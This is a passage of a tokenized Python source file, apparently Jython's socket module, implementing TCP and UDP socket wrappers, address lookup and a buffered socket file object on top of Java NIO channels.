jchannel = java . nio . channels . ServerSocketChannel . open ( ) <EOL> self . jsocket = self . jchannel . socket ( ) <EOL> if host : <EOL> bindaddr = java . net . InetSocketAddress ( host , port ) <EOL> else : <EOL> bindaddr = java . net . InetSocketAddress ( port ) <EOL> self . jsocket . setReuseAddress ( reuse_addr ) <EOL> self . jsocket . bind ( bindaddr , backlog ) <EOL> self . socketio = org . python . core . io . ServerSocketIO ( self . jchannel , '<STR_LIT>' ) <EOL> def accept ( self ) : <EOL> if self . mode in ( MODE_BLOCKING , MODE_NONBLOCKING ) : <EOL> new_cli_chan = self . jchannel . accept ( ) <EOL> if new_cli_chan != None : <EOL> return _client_socket_impl ( new_cli_chan . socket ( ) ) <EOL> else : <EOL> return None <EOL> else : <EOL> new_cli_sock = self . jsocket . accept ( ) <EOL> return _client_socket_impl ( new_cli_sock ) <EOL> def shutdown ( self , how ) : <EOL> pass <EOL> class _datagram_socket_impl ( _nio_impl ) : <EOL> options = { <EOL> ( SOL_SOCKET , SO_BROADCAST ) : '<STR_LIT>' , <EOL> ( SOL_SOCKET , SO_RCVBUF ) : '<STR_LIT>' , <EOL> ( SOL_SOCKET , SO_REUSEADDR ) : '<STR_LIT>' , <EOL> ( SOL_SOCKET , SO_SNDBUF ) : '<STR_LIT>' , <EOL> ( SOL_SOCKET , SO_TIMEOUT ) : '<STR_LIT>' , <EOL> } <EOL> def __init__ ( self , port = None , address = None , reuse_addr = <NUM_LIT:0> ) : <EOL> self . jchannel = java . nio . channels . DatagramChannel . open ( ) <EOL> self . jsocket = self . jchannel . socket ( ) <EOL> if port is not None : <EOL> if address is not None : <EOL> local_address = java . net . InetSocketAddress ( address , port ) <EOL> else : <EOL> local_address = java . net . InetSocketAddress ( port ) <EOL> self . jsocket . setReuseAddress ( reuse_addr ) <EOL> self . jsocket . bind ( local_address ) <EOL> self . socketio = org . python . core . io . DatagramSocketIO ( self . jchannel , '<STR_LIT>' ) <EOL> def connect ( self , host , port ) : <EOL> self . jchannel . connect ( java . net . InetSocketAddress ( host , port ) ) <EOL> def disconnect ( self ) : <EOL> """<STR_LIT>""" <EOL> self . jchannel . disconnect ( ) <EOL> def shutdown ( self , how ) : <EOL> pass <EOL> def _do_send_net ( self , byte_array , socket_address , flags ) : <EOL> num_bytes = len ( byte_array ) <EOL> if self . jsocket . isConnected ( ) and socket_address is None : <EOL> packet = java . net . DatagramPacket ( byte_array , num_bytes ) <EOL> else : <EOL> packet = java . net . DatagramPacket ( byte_array , num_bytes , socket_address ) <EOL> self . jsocket . send ( packet ) <EOL> return num_bytes <EOL> def _do_send_nio ( self , byte_array , socket_address , flags ) : <EOL> byte_buf = java . nio . ByteBuffer . wrap ( byte_array ) <EOL> if self . jchannel . isConnected ( ) and socket_address is None : <EOL> bytes_sent = self . jchannel . write ( byte_buf ) <EOL> else : <EOL> bytes_sent = self . jchannel . send ( byte_buf , socket_address ) <EOL> return bytes_sent <EOL> def sendto ( self , byte_array , host , port , flags ) : <EOL> socket_address = java . net . InetSocketAddress ( host , port ) <EOL> if self . mode == MODE_TIMEOUT : <EOL> return self . _do_send_net ( byte_array , socket_address , flags ) <EOL> else : <EOL> return self . _do_send_nio ( byte_array , socket_address , flags ) <EOL> def send ( self , byte_array , flags ) : <EOL> if self . mode == MODE_TIMEOUT : <EOL> return self . _do_send_net ( byte_array , None , flags ) <EOL> else : <EOL> return self . _do_send_nio ( byte_array , None , flags ) <EOL> def _do_receive_net ( self , return_source_address , num_bytes , flags ) : <EOL> byte_array = jarray . zeros ( num_bytes , '<STR_LIT:b>' ) <EOL> packet = java . net . DatagramPacket ( byte_array , num_bytes ) <EOL> self . jsocket . receive ( packet ) <EOL> bytes_rcvd = packet . getLength ( ) <EOL> if bytes_rcvd < num_bytes : <EOL> byte_array = byte_array [ : bytes_rcvd ] <EOL> return_data = byte_array . tostring ( ) <EOL> if return_source_address : <EOL> host = None <EOL> if packet . getAddress ( ) : <EOL> host = packet . getAddress ( ) . getHostAddress ( ) <EOL> port = packet . getPort ( ) <EOL> return return_data , ( host , port ) <EOL> else : <EOL> return return_data <EOL> def _do_receive_nio ( self , return_source_address , num_bytes , flags ) : <EOL> byte_array = jarray . zeros ( num_bytes , '<STR_LIT:b>' ) <EOL> byte_buf = java . nio . ByteBuffer . wrap ( byte_array ) <EOL> source_address = self . jchannel . receive ( byte_buf ) <EOL> if source_address is None and not self . jchannel . isBlocking ( ) : <EOL> raise would_block_error ( ) <EOL> byte_buf . flip ( ) ; bytes_read = byte_buf . remaining ( ) <EOL> if bytes_read < num_bytes : <EOL> byte_array = byte_array [ : bytes_read ] <EOL> return_data = byte_array . tostring ( ) <EOL> if return_source_address : <EOL> return return_data , ( source_address . getAddress ( ) . getHostAddress ( ) , source_address . getPort ( ) ) <EOL> else : <EOL> return return_data <EOL> def recvfrom ( self , num_bytes , flags ) : <EOL> if self . mode == MODE_TIMEOUT : <EOL> return self . _do_receive_net ( <NUM_LIT:1> , num_bytes , flags ) <EOL> else : <EOL> return self . _do_receive_nio ( <NUM_LIT:1> , num_bytes , flags ) <EOL> def recv ( self , num_bytes , flags ) : <EOL> if self . mode == MODE_TIMEOUT : <EOL> return self . _do_receive_net ( <NUM_LIT:0> , num_bytes , flags ) <EOL> else : <EOL> return self . _do_receive_nio ( <NUM_LIT:0> , num_bytes , flags ) <EOL> has_ipv6 = False <EOL> def _gethostbyaddr ( name ) : <EOL> addresses = java . net . InetAddress . getAllByName ( gethostbyname ( name ) ) <EOL> names = [ ] <EOL> addrs = [ ] <EOL> for addr in addresses : <EOL> names . append ( asPyString ( addr . getHostName ( ) ) ) <EOL> addrs . append ( asPyString ( addr . getHostAddress ( ) ) ) <EOL> return ( names , addrs ) <EOL> def getfqdn ( name = None ) : <EOL> """<STR_LIT>""" <EOL> if not name : <EOL> name = gethostname ( ) <EOL> names , addrs = _gethostbyaddr ( name ) <EOL> for a in names : <EOL> if a . find ( "<STR_LIT:.>" ) >= <NUM_LIT:0> : <EOL> return a <EOL> return name <EOL> def gethostname ( ) : <EOL> try : <EOL> return asPyString ( java . net . InetAddress . getLocalHost ( ) . getHostName ( ) ) <EOL> except java . lang . Exception , jlx : <EOL> raise _map_exception ( jlx ) <EOL> def gethostbyname ( name ) : <EOL> try : <EOL> return asPyString ( java . net . InetAddress . getByName ( name ) . getHostAddress ( ) ) <EOL> except java . lang . Exception , jlx : <EOL> raise _map_exception ( jlx ) <EOL> def gethostbyaddr ( name ) : <EOL> names , addrs = _gethostbyaddr ( name ) <EOL> return ( names [ <NUM_LIT:0> ] , names , addrs ) <EOL> def getservbyname ( servicename , protocolname = None ) : <EOL> raise NotImplementedError ( "<STR_LIT>" ) <EOL> def getservbyport ( port , protocolname = None ) : <EOL> raise NotImplementedError ( "<STR_LIT>" ) <EOL> def getprotobyname ( protocolname = None ) : <EOL> raise NotImplementedError ( "<STR_LIT>" ) <EOL> def _realsocket ( family = AF_INET , type = SOCK_STREAM , protocol = <NUM_LIT:0> ) : <EOL> assert family == AF_INET , "<STR_LIT>" <EOL> assert type in ( SOCK_DGRAM , SOCK_STREAM ) , "<STR_LIT>" <EOL> if type == SOCK_STREAM : <EOL> if protocol != <NUM_LIT:0> : <EOL> assert protocol == IPPROTO_TCP , "<STR_LIT>" <EOL> return _tcpsocket ( ) <EOL> else : <EOL> if protocol != <NUM_LIT:0> : <EOL> assert protocol == IPPROTO_UDP , "<STR_LIT>" <EOL> return _udpsocket ( ) <EOL> def getaddrinfo ( host , port , family = AF_INET , socktype = None , proto = <NUM_LIT:0> , flags = None ) : <EOL> try : <EOL> if not family in [ AF_INET , AF_INET6 , AF_UNSPEC ] : <EOL> raise gaierror ( errno . EIO , '<STR_LIT>' ) <EOL> filter_fns = [ ] <EOL> filter_fns . append ( { <EOL> AF_INET : lambda x : isinstance ( x , java . net . Inet4Address ) , <EOL> AF_INET6 : lambda x : isinstance ( x , java . net . Inet6Address ) , <EOL> AF_UNSPEC : lambda x : isinstance ( x , java . net . InetAddress ) , <EOL> } [ family ] ) <EOL> if host == "<STR_LIT>" : <EOL> host = java . net . InetAddress . getLocalHost ( ) . getHostName ( ) <EOL> passive_mode = flags is not None and flags & AI_PASSIVE <EOL> canonname_mode = flags is not None and flags & AI_CANONNAME <EOL> results = [ ] <EOL> for a in java . net . InetAddress . getAllByName ( host ) : <EOL> if len ( [ f for f in filter_fns if f ( a ) ] ) : <EOL> family = { java . net . Inet4Address : AF_INET , java . net . Inet6Address : AF_INET6 } [ a . getClass ( ) ] <EOL> if passive_mode and not canonname_mode : <EOL> canonname = "<STR_LIT>" <EOL> else : <EOL> canonname = asPyString ( a . getCanonicalHostName ( ) ) <EOL> if host is None and passive_mode and not canonname_mode : <EOL> sockname = INADDR_ANY <EOL> else : <EOL> sockname = asPyString ( a . getHostAddress ( ) ) <EOL> results . append ( ( family , socktype , proto , canonname , ( sockname , port ) ) ) <EOL> return results <EOL> except java . lang . Exception , jlx : <EOL> raise _map_exception ( jlx ) <EOL> def getnameinfo ( sock_addr , flags ) : <EOL> raise NotImplementedError ( "<STR_LIT>" ) <EOL> def getdefaulttimeout ( ) : <EOL> return _defaulttimeout <EOL> def _calctimeoutvalue ( value ) : <EOL> if value is None : <EOL> return None <EOL> try : <EOL> floatvalue = float ( value ) <EOL> except : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> if floatvalue < <NUM_LIT:0.0> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if floatvalue < <NUM_LIT> : <EOL> return <NUM_LIT:0.0> <EOL> return floatvalue <EOL> def setdefaulttimeout ( timeout ) : <EOL> global _defaulttimeout <EOL> try : <EOL> _defaulttimeout = _calctimeoutvalue ( timeout ) <EOL> finally : <EOL> _nonblocking_api_mixin . timeout = _defaulttimeout <EOL> def htons ( x ) : return x <EOL> def htonl ( x ) : return x <EOL> def ntohs ( x ) : return x <EOL> def ntohl ( x ) : return x <EOL> def inet_pton ( family , ip_string ) : <EOL> try : <EOL> ia = java . net . InetAddress . getByName ( ip_string ) <EOL> bytes = [ ] <EOL> for byte in ia . getAddress ( ) : <EOL> if byte < <NUM_LIT:0> : <EOL> bytes . append ( byte + <NUM_LIT> ) <EOL> else : <EOL> bytes . append ( byte ) <EOL> return "<STR_LIT>" . join ( [ chr ( byte ) for byte in bytes ] ) <EOL> except java . lang . Exception , jlx : <EOL> raise _map_exception ( jlx ) <EOL> def inet_ntop ( family , packed_ip ) : <EOL> try : <EOL> jByteArray = jarray . array ( packed_ip , '<STR_LIT:b>' ) <EOL> ia = java . net . InetAddress . getByAddress ( jByteArray ) <EOL> return ia . getHostAddress ( ) <EOL> except java . lang . Exception , jlx : <EOL> raise _map_exception ( jlx ) <EOL> def inet_aton ( ip_string ) : <EOL> return inet_pton ( AF_INET , ip_string ) <EOL> def inet_ntoa ( packed_ip ) : <EOL> return inet_ntop ( AF_INET , packed_ip ) <EOL> class _nonblocking_api_mixin : <EOL> mode = MODE_BLOCKING <EOL> reference_count = <NUM_LIT:0> <EOL> close_lock = threading . Lock ( ) <EOL> def __init__ ( self ) : <EOL> self . timeout = _defaulttimeout <EOL> if self . timeout is not None : <EOL> self . mode = MODE_TIMEOUT <EOL> self . pending_options = { <EOL> ( SOL_SOCKET , SO_REUSEADDR ) : <NUM_LIT:0> , <EOL> } <EOL> def gettimeout ( self ) : <EOL> return self . timeout <EOL> def settimeout ( self , timeout ) : <EOL> self . timeout = _calctimeoutvalue ( timeout ) <EOL> if self . timeout is None : <EOL> self . mode = MODE_BLOCKING <EOL> elif self . timeout < <NUM_LIT> : <EOL> self . mode = MODE_NONBLOCKING <EOL> else : <EOL> self . mode = MODE_TIMEOUT <EOL> self . _config ( ) <EOL> def setblocking ( self , flag ) : <EOL> if flag : <EOL> self . mode = MODE_BLOCKING <EOL> self . timeout = None <EOL> else : <EOL> self . mode = MODE_NONBLOCKING <EOL> self . timeout = <NUM_LIT:0.0> <EOL> self . _config ( ) <EOL> def getblocking ( self ) : <EOL> return self . mode == MODE_BLOCKING <EOL> def setsockopt ( self , level , optname , value ) : <EOL> try : <EOL> if self . sock_impl : <EOL> self . sock_impl . setsockopt ( level , optname , value ) <EOL> else : <EOL> self . pending_options [ ( level , optname ) ] = value <EOL> except java . lang . Exception , jlx : <EOL> raise _map_exception ( jlx ) <EOL> def getsockopt ( self , level , optname ) : <EOL> try : <EOL> if self . sock_impl : <EOL> return self . sock_impl . getsockopt ( level , optname ) <EOL> else : <EOL> return self . pending_options . get ( ( level , optname ) , None ) <EOL> except java . lang . Exception , jlx : <EOL> raise _map_exception ( jlx ) <EOL> def shutdown ( self , how ) : <EOL> assert how in ( SHUT_RD , SHUT_WR , SHUT_RDWR ) <EOL> if not self . sock_impl : <EOL> raise error ( errno . ENOTCONN , "<STR_LIT>" ) <EOL> try : <EOL> self . sock_impl . shutdown ( how ) <EOL> except java . lang . Exception , jlx : <EOL> raise _map_exception ( jlx ) <EOL> def close ( self ) : <EOL> try : <EOL> if self . sock_impl : <EOL> self . sock_impl . close ( ) <EOL> except java . lang . Exception , jlx : <EOL> raise _map_exception ( jlx ) <EOL> def _config ( self ) : <EOL> assert self . mode in _permitted_modes <EOL> if self . sock_impl : <EOL> self . sock_impl . config ( self . mode , self . timeout ) <EOL> for level , optname in self . pending_options . keys ( ) : <EOL> if optname != SO_REUSEADDR : <EOL> self . sock_impl . setsockopt ( level , optname , self . pending_options [ ( level , optname ) ] ) <EOL> def getchannel ( self ) : <EOL> if not self . sock_impl : <EOL> return None <EOL> return self . sock_impl . getchannel ( ) <EOL> def fileno ( self ) : <EOL> if not self . sock_impl : <EOL> return None <EOL> return self . sock_impl . fileno ( ) <EOL> def _get_jsocket ( self ) : <EOL> return self . sock_impl . jsocket <EOL> def _unpack_address_tuple ( address_tuple ) : <EOL> error_message = "<STR_LIT>" <EOL> if not isinstance ( address_tuple , tuple ) or not isinstance ( address_tuple [ <NUM_LIT:0> ] , basestring ) or not isinstance ( address_tuple [ <NUM_LIT:1> ] , ( int , long ) ) : <EOL> raise TypeError ( error_message ) <EOL> hostname = address_tuple [ <NUM_LIT:0> ] <EOL> if isinstance ( hostname , unicode ) : <EOL> hostname = hostname . encode ( ) <EOL> hostname = hostname . strip ( ) <EOL> return hostname , address_tuple [ <NUM_LIT:1> ] <EOL> class _tcpsocket ( _nonblocking_api_mixin ) : <EOL> sock_impl = None <EOL> istream = None <EOL> ostream = None <EOL> local_addr = None <EOL> server = <NUM_LIT:0> <EOL> def __init__ ( self ) : <EOL> _nonblocking_api_mixin . __init__ ( self ) <EOL> def bind ( self , addr ) : <EOL> assert not self . sock_impl <EOL> assert not self . local_addr <EOL> _unpack_address_tuple ( addr ) <EOL> self . local_addr = addr <EOL> def listen ( self , backlog ) : <EOL> "<STR_LIT>" <EOL> try : <EOL> assert not self . sock_impl <EOL> self . server = <NUM_LIT:1> <EOL> if self . local_addr : <EOL> host , port = _unpack_address_tuple ( self . local_addr ) <EOL> else : <EOL> host , port = "<STR_LIT>" , <NUM_LIT:0> <EOL> self . sock_impl = _server_socket_impl ( host , port , backlog , self . pending_options [ ( SOL_SOCKET , SO_REUSEADDR ) ] ) <EOL> self . _config ( ) <EOL> except java . lang . Exception , jlx : <EOL> raise _map_exception ( jlx ) <EOL> def accept ( self ) : <EOL> "<STR_LIT>" <EOL> try : <EOL> if not self . sock_impl : <EOL> self . listen ( ) <EOL> assert self . server <EOL> new_sock = self . sock_impl . accept ( ) <EOL> if not new_sock : <EOL> raise would_block_error ( ) <EOL> cliconn = _tcpsocket ( ) <EOL> cliconn . pending_options [ ( SOL_SOCKET , SO_REUSEADDR ) ] = new_sock . jsocket . getReuseAddress ( ) <EOL> cliconn . sock_impl = new_sock <EOL> cliconn . _setup ( ) <EOL> return cliconn , new_sock . getpeername ( ) <EOL> except java . lang . Exception , jlx : <EOL> raise _map_exception ( jlx ) <EOL> def _get_host_port ( self , addr ) : <EOL> host , port = _unpack_address_tuple ( addr ) <EOL> if host == "<STR_LIT>" : <EOL> host = java . net . InetAddress . getLocalHost ( ) <EOL> return host , port <EOL> def _do_connect ( self , addr ) : <EOL> try : <EOL> assert not self . sock_impl <EOL> host , port = self . _get_host_port ( addr ) <EOL> self . sock_impl = _client_socket_impl ( ) <EOL> if self . local_addr : <EOL> bind_host , bind_port = _unpack_address_tuple ( self . local_addr ) <EOL> self . sock_impl . bind ( bind_host , bind_port , self . pending_options [ ( SOL_SOCKET , SO_REUSEADDR ) ] ) <EOL> self . _config ( ) <EOL> self . sock_impl . connect ( host , port ) <EOL> except java . lang . Exception , jlx : <EOL> raise _map_exception ( jlx ) <EOL> def connect ( self , addr ) : <EOL> "<STR_LIT>" <EOL> self . _do_connect ( addr ) <EOL> self . _setup ( ) <EOL> def connect_ex ( self , addr ) : <EOL> "<STR_LIT>" <EOL> if not self . sock_impl : <EOL> self . _do_connect ( addr ) <EOL> if self . sock_impl . finish_connect ( ) : <EOL> self . _setup ( ) <EOL> if self . mode == MODE_NONBLOCKING : <EOL> return errno . EISCONN <EOL> return <NUM_LIT:0> <EOL> return errno . EINPROGRESS <EOL> def _setup ( self ) : <EOL> if self . mode != MODE_NONBLOCKING : <EOL> self . istream = self . sock_impl . jsocket . getInputStream ( ) <EOL> self . ostream = self . sock_impl . jsocket . getOutputStream ( ) <EOL> def recv ( self , n ) : <EOL> try : <EOL> if not self . sock_impl : raise error ( errno . ENOTCONN , '<STR_LIT>' ) <EOL> if self . sock_impl . jchannel . isConnectionPending ( ) : <EOL> self . sock_impl . jchannel . finishConnect ( ) <EOL> data = jarray . zeros ( n , '<STR_LIT:b>' ) <EOL> m = self . sock_impl . read ( data ) <EOL> if m == - <NUM_LIT:1> : <EOL> return "<STR_LIT>" <EOL> elif m <= <NUM_LIT:0> : <EOL> if self . mode == MODE_NONBLOCKING : <EOL> raise would_block_error ( ) <EOL> return "<STR_LIT>" <EOL> if m < n : <EOL> data = data [ : m ] <EOL> return data . tostring ( ) <EOL> except java . lang . Exception , jlx : <EOL> raise _map_exception ( jlx ) <EOL> def recvfrom ( self , n ) : <EOL> return self . recv ( n ) , None <EOL> def send ( self , s ) : <EOL> try : <EOL> if not self . sock_impl : raise error ( errno . ENOTCONN , '<STR_LIT>' ) <EOL> if self . sock_impl . jchannel . isConnectionPending ( ) : <EOL> self . sock_impl . jchannel . finishConnect ( ) <EOL> numwritten = self . sock_impl . write ( s ) <EOL> if numwritten == <NUM_LIT:0> and self . mode == MODE_NONBLOCKING : <EOL> raise would_block_error ( ) <EOL> return numwritten <EOL> except java . lang . Exception , jlx : <EOL> raise _map_exception ( jlx ) <EOL> sendall = send <EOL> def getsockname ( self ) : <EOL> try : <EOL> if not self . sock_impl : <EOL> host , port = self . local_addr or ( "<STR_LIT>" , <NUM_LIT:0> ) <EOL> host = java . net . InetAddress . getByName ( host ) . getHostAddress ( ) <EOL> else : <EOL> if self . server : <EOL> host = self . sock_impl . jsocket . getInetAddress ( ) . getHostAddress ( ) <EOL> else : <EOL> host = self . sock_impl . jsocket . getLocalAddress ( ) . getHostAddress ( ) <EOL> port = self . sock_impl . jsocket . getLocalPort ( ) <EOL> return ( host , port ) <EOL> except java . lang . Exception , jlx : <EOL> raise _map_exception ( jlx ) <EOL> def getpeername ( self ) : <EOL> try : <EOL> assert self . sock_impl <EOL> assert not self . server <EOL> host = self . sock_impl . jsocket . getInetAddress ( ) . getHostAddress ( ) <EOL> port = self . sock_impl . jsocket . getPort ( ) <EOL> return ( host , port ) <EOL> except java . lang . Exception , jlx : <EOL> raise _map_exception ( jlx ) <EOL> def close ( self ) : <EOL> try : <EOL> if self . istream : <EOL> self . istream . close ( ) <EOL> if self . ostream : <EOL> self . ostream . close ( ) <EOL> if self . sock_impl : <EOL> self . sock_impl . close ( ) <EOL> except java . lang . Exception , jlx : <EOL> raise _map_exception ( jlx ) <EOL> class _udpsocket ( _nonblocking_api_mixin ) : <EOL> sock_impl = None <EOL> addr = None <EOL> def __init__ ( self ) : <EOL> _nonblocking_api_mixin . __init__ ( self ) <EOL> def bind ( self , addr ) : <EOL> try : <EOL> assert not self . sock_impl <EOL> host , port = _unpack_address_tuple ( addr ) <EOL> if host == "<STR_LIT>" : <EOL> host = INADDR_ANY <EOL> host_address = java . net . InetAddress . getByName ( host ) <EOL> self . sock_impl = _datagram_socket_impl ( port , host_address , self . pending_options [ ( SOL_SOCKET , SO_REUSEADDR ) ] ) <EOL> self . _config ( ) <EOL> except java . lang . Exception , jlx : <EOL> raise _map_exception ( jlx ) <EOL> def _do_connect ( self , addr ) : <EOL> try : <EOL> host , port = _unpack_address_tuple ( addr ) <EOL> assert not self . addr <EOL> self . addr = addr <EOL> if not self . sock_impl : <EOL> self . sock_impl = _datagram_socket_impl ( ) <EOL> self . _config ( ) <EOL> self . sock_impl . connect ( host , port ) <EOL> except java . lang . Exception , jlx : <EOL> raise _map_exception ( jlx ) <EOL> def connect ( self , addr ) : <EOL> self . _do_connect ( addr ) <EOL> def connect_ex ( self , addr ) : <EOL> if not self . sock_impl : <EOL> self . _do_connect ( addr ) <EOL> return <NUM_LIT:0> <EOL> def sendto ( self , data , p1 , p2 = None ) : <EOL> try : <EOL> if not p2 : <EOL> flags , addr = <NUM_LIT:0> , p1 <EOL> else : <EOL> flags , addr = <NUM_LIT:0> , p2 <EOL> if not self . sock_impl : <EOL> self . sock_impl = _datagram_socket_impl ( ) <EOL> self . _config ( ) <EOL> host , port = _unpack_address_tuple ( addr ) <EOL> if host == "<STR_LIT>" : <EOL> host = INADDR_BROADCAST <EOL> byte_array = java . lang . String ( data ) . getBytes ( '<STR_LIT>' ) <EOL> result = self . sock_impl . sendto ( byte_array , host , port , flags ) <EOL> return result <EOL> except java . lang . Exception , jlx : <EOL> raise _map_exception ( jlx ) <EOL> def send ( self , data , flags = None ) : <EOL> if not self . addr : raise error ( errno . ENOTCONN , "<STR_LIT>" ) <EOL> byte_array = java . lang . String ( data ) . getBytes ( '<STR_LIT>' ) <EOL> return self . sock_impl . send ( byte_array , flags ) <EOL> def recvfrom ( self , num_bytes , flags = None ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> if not self . sock_impl : <EOL> self . sock_impl = _datagram_socket_impl ( ) <EOL> self . _config ( ) <EOL> return self . sock_impl . recvfrom ( num_bytes , flags ) <EOL> except java . lang . Exception , jlx : <EOL> raise _map_exception ( jlx ) <EOL> def recv ( self , num_bytes , flags = None ) : <EOL> if not self . sock_impl : raise error ( errno . ENOTCONN , "<STR_LIT>" ) <EOL> try : <EOL> return self . sock_impl . recv ( num_bytes , flags ) <EOL> except java . lang . Exception , jlx : <EOL> raise _map_exception ( jlx ) <EOL> def getsockname ( self ) : <EOL> try : <EOL> assert self . sock_impl <EOL> host = self . sock_impl . jsocket . getLocalAddress ( ) . getHostAddress ( ) <EOL> port = self . sock_impl . jsocket . getLocalPort ( ) <EOL> return ( host , port ) <EOL> except java . lang . Exception , jlx : <EOL> raise _map_exception ( jlx ) <EOL> def getpeername ( self ) : <EOL> try : <EOL> assert self . sock <EOL> host = self . sock_impl . jsocket . getInetAddress ( ) . getHostAddress ( ) <EOL> port = self . sock_impl . jsocket . getPort ( ) <EOL> return ( host , port ) <EOL> except java . lang . Exception , jlx : <EOL> raise _map_exception ( jlx ) <EOL> def __del__ ( self ) : <EOL> self . close ( ) <EOL> _socketmethods = ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> _delegate_methods = ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" ) <EOL> class _closedsocket ( object ) : <EOL> __slots__ = [ ] <EOL> def _dummy ( * args ) : <EOL> raise error ( errno . EBADF , '<STR_LIT>' ) <EOL> send = recv = recv_into = sendto = recvfrom = recvfrom_into = _dummy <EOL> __getattr__ = _dummy <EOL> _active_sockets = set ( ) <EOL> def _closeActiveSockets ( ) : <EOL> for socket in _active_sockets . copy ( ) : <EOL> try : <EOL> socket . close ( ) <EOL> except error : <EOL> msg = '<STR_LIT>' % ( socket , sys . exc_info ( ) ) <EOL> print >> sys . stderr , msg <EOL> class _socketobject ( object ) : <EOL> __doc__ = _realsocket . __doc__ <EOL> __slots__ = [ "<STR_LIT>" , "<STR_LIT>" ] + list ( _delegate_methods ) <EOL> def __init__ ( self , family = AF_INET , type = SOCK_STREAM , proto = <NUM_LIT:0> , _sock = None ) : <EOL> if _sock is None : <EOL> _sock = _realsocket ( family , type , proto ) <EOL> _sock . reference_count += <NUM_LIT:1> <EOL> elif isinstance ( _sock , _nonblocking_api_mixin ) : <EOL> _sock . reference_count += <NUM_LIT:1> <EOL> self . _sock = _sock <EOL> for method in _delegate_methods : <EOL> meth = getattr ( _sock , method , None ) <EOL> if meth : <EOL> setattr ( self , method , meth ) <EOL> _active_sockets . add ( self ) <EOL> def close ( self ) : <EOL> try : <EOL> _active_sockets . remove ( self ) <EOL> except KeyError : <EOL> pass <EOL> _sock = self . _sock <EOL> if isinstance ( _sock , _nonblocking_api_mixin ) : <EOL> _sock . close_lock . acquire ( ) <EOL> try : <EOL> _sock . reference_count -= <NUM_LIT:1> <EOL> if not _sock . reference_count : <EOL> _sock . close ( ) <EOL> self . _sock = _closedsocket ( ) <EOL> dummy = self . _sock . _dummy <EOL> for method in _delegate_methods : <EOL> setattr ( self , method , dummy ) <EOL> self . send = self . recv = self . sendto = self . recvfrom = self . _sock . _dummy <EOL> finally : <EOL> _sock . close_lock . release ( ) <EOL> def accept ( self ) : <EOL> sock , addr = self . _sock . accept ( ) <EOL> return _socketobject ( _sock = sock ) , addr <EOL> def dup ( self ) : <EOL> """<STR_LIT>""" <EOL> _sock = self . _sock <EOL> if not isinstance ( _sock , _nonblocking_api_mixin ) : <EOL> return _socketobject ( _sock = _sock ) <EOL> _sock . close_lock . acquire ( ) <EOL> try : <EOL> duped = _socketobject ( _sock = _sock ) <EOL> finally : <EOL> _sock . close_lock . release ( ) <EOL> return duped <EOL> def makefile ( self , mode = '<STR_LIT:r>' , bufsize = - <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> _sock = self . _sock <EOL> if not isinstance ( _sock , _nonblocking_api_mixin ) : <EOL> return _fileobject ( _sock , mode , bufsize ) <EOL> _sock . close_lock . acquire ( ) <EOL> try : <EOL> fileobject = _fileobject ( _sock , mode , bufsize ) <EOL> finally : <EOL> _sock . close_lock . release ( ) <EOL> return fileobject <EOL> family = property ( lambda self : self . _sock . family , doc = "<STR_LIT>" ) <EOL> type = property ( lambda self : self . _sock . type , doc = "<STR_LIT>" ) <EOL> proto = property ( lambda self : self . _sock . proto , doc = "<STR_LIT>" ) <EOL> _s = ( "<STR_LIT>" <EOL> ) <EOL> for _m in _socketmethods : <EOL> exec _s % ( _m , _m ) <EOL> del _m , _s <EOL> socket = SocketType = _socketobject <EOL> class _fileobject ( object ) : <EOL> """<STR_LIT>""" <EOL> default_bufsize = <NUM_LIT> <EOL> name = "<STR_LIT>" <EOL> __slots__ = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" ] <EOL> def __init__ ( self , sock , mode = '<STR_LIT:rb>' , bufsize = - <NUM_LIT:1> , close = False ) : <EOL> self . _sock = sock <EOL> if isinstance ( sock , _nonblocking_api_mixin ) : <EOL> sock . reference_count += <NUM_LIT:1> <EOL> self . mode = mode <EOL> if bufsize < <NUM_LIT:0> : <EOL> bufsize = self . default_bufsize <EOL> self . bufsize = bufsize <EOL> self . softspace = False <EOL> if bufsize == <NUM_LIT:0> : <EOL> self . _rbufsize = <NUM_LIT:1> <EOL> elif bufsize == <NUM_LIT:1> : <EOL> self . _rbufsize = self . default_bufsize <EOL> else : <EOL> self . _rbufsize = bufsize <EOL> self . _wbufsize = bufsize <EOL> self . _rbuf = "<STR_LIT>" <EOL> self . _wbuf = [ ] <EOL> self . _close = close <EOL> def _getclosed ( self ) : <EOL> return self . _sock is None <EOL> closed = property ( _getclosed , doc = "<STR_LIT>" ) <EOL> def close ( self ) : <EOL> try : <EOL> if self . _sock : <EOL> self . flush ( ) <EOL> finally : <EOL> if self . _sock : <EOL> if isinstance ( self . _sock , _nonblocking_api_mixin ) : <EOL> self . _sock . reference_count -= <NUM_LIT:1> <EOL> if not self . _sock . reference_count or self . _close : <EOL> self . _sock . close ( ) <EOL> elif self . _close : <EOL> self . _sock . close ( ) <EOL> self . _sock = None <EOL> def __del__ ( self ) : <EOL> try : <EOL> self . close ( ) <EOL> except : <EOL> pass <EOL> def flush ( self ) : <EOL> if self . _wbuf : <EOL> buffer = "<STR_LIT>" . join ( self . _wbuf ) <EOL> self . _wbuf = [ ] <EOL> self . _sock . sendall ( buffer ) <EOL> def fileno ( self ) : <EOL> return self . _sock . fileno ( ) <EOL> def write ( self , data ) : <EOL> data = str ( data ) <EOL> if not data : <EOL> return <EOL> self . _wbuf . append ( data ) <EOL> if ( self . _wbufsize == <NUM_LIT:0> or <EOL> self . _wbufsize == <NUM_LIT:1> and '<STR_LIT:\n>' in data or <EOL> self . _get_wbuf_len ( ) >= self . _wbufsize ) : <EOL> self . flush ( ) <EOL> def writelines ( self , list ) : <EOL> self . _wbuf . extend ( filter ( None , map ( str , list ) ) ) <EOL> if ( self . _wbufsize <= <NUM_LIT:1> or <EOL> 